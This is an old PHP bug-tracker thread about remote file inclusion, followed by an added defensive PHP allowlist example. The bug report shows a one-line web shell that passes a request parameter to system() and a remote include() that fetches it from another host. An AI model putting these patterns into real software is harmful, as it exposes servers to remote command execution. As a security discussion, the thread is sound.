ID: 15187
User updated by: [EMAIL PROTECTED]
Reported By: [EMAIL PROTECTED]
Status: Bogus
Bug Type: Scripting Engine problem
Operating System: Linux 2.4
PHP Version: 4.1.1
New Comment:

It's true that this is a 'user error', however there are scripts (e.g.
phpnuke has this problem) that allow a user to enter the URL that will
be included. 

So, you're right, if a script is secure you won't deal with this bug... but
I still see it as a security issue.


Previous Comments:
------------------------------------------------------------------------

[2002-01-23 15:37:30] [EMAIL PROTECTED]

This is bad programming. If you want to avoid this, you should NOT use
include() for stuff on other servers, but fopen() or similar instead
(which doesn't parse the data).

BTW: the 'bug' in issue.php can be avoided by proper use of
register_globals, safe-mode and/or normal (unix) file permissions.

------------------------------------------------------------------------

[2002-01-23 15:36:30] [EMAIL PROTECTED]

RTFM!

Include is for including PHP scripts into your PHP script.
If you only want to include parsed output then do not use
include.


------------------------------------------------------------------------

[2002-01-23 15:36:28] [EMAIL PROTECTED]

I call it a user error. No external sources are to be trusted with no
error/security/integrity check.

------------------------------------------------------------------------

[2002-01-23 15:30:20] [EMAIL PROTECTED]

Hello,

I think there is a pretty large security issue in PHP. E.g. we have 2
servers, we call server 1 'embrace', and name server 2 'kossy'.

On embrace we create a file index.php:
<? include("http://kossy/issue.php"); ?>

on kossy we create a file issue.php:
<? system($cmd); ?>

Well, if we now type: http://embrace/index.php?cmd=ls we see the 'ls'
output from kossy. This is the way it should be.. BUT, when we disable
PHP on kossy we get a rather nasty bug (imho).

If we type http://embrace/index.php?cmd=ls again (where kossy has no
PHP support) embrace includes the PHP source code from kossy and then
parses the file, which will give us the 'ls' result on embrace.

This can be used for numerous attacks. And I think PHP should only include
parsed PHP or non-PHP files from external (http://) links.

Bye,
Tozz


------------------------------------------------------------------------
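
The defensive pattern the replies point to, as an added example that is not part of the original thread or of PHP itself: a request value is mapped through an allowlist to a local file before include(), and remote content is read as inert text. PAGES_DIR, the page names and both function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example. In php.ini, allow_url_include = Off (PHP 5.2 and later)
// stops include() from accepting http:// URLs at all.

const PAGES_DIR = __DIR__ . '/pages';          // hypothetical directory

// Allowlist: request value => file under PAGES_DIR (hypothetical names).
const PAGES = [
    'home' => 'home.php',
    'news' => 'news.php',
];

function resolve_include(string $requested): ?string
{
    // Only exact allowlist keys pass, so "http://kossy/issue.php" or
    // "../index" never reach include().
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$requested]);
    // realpath() is false for missing files; the prefix check catches a
    // symlink that points outside PAGES_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function fetch_remote_as_text(string $url): string
{
    // Remote content is treated as data: read, escaped, never parsed as PHP.
    $body = file_get_contents($url);
    return $body === false ? '' : htmlspecialchars($body, ENT_QUOTES, 'UTF-8');
}

// Constructed sample inputs; "home" is also rejected if pages/home.php
// does not exist on the machine running this.
foreach (['home', 'http://kossy/issue.php', '../index'] as $input) {
    $file = resolve_include($input);
    echo $input, ' => ', $file === null ? 'rejected' : 'include ' . $file, PHP_EOL;
}
```
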


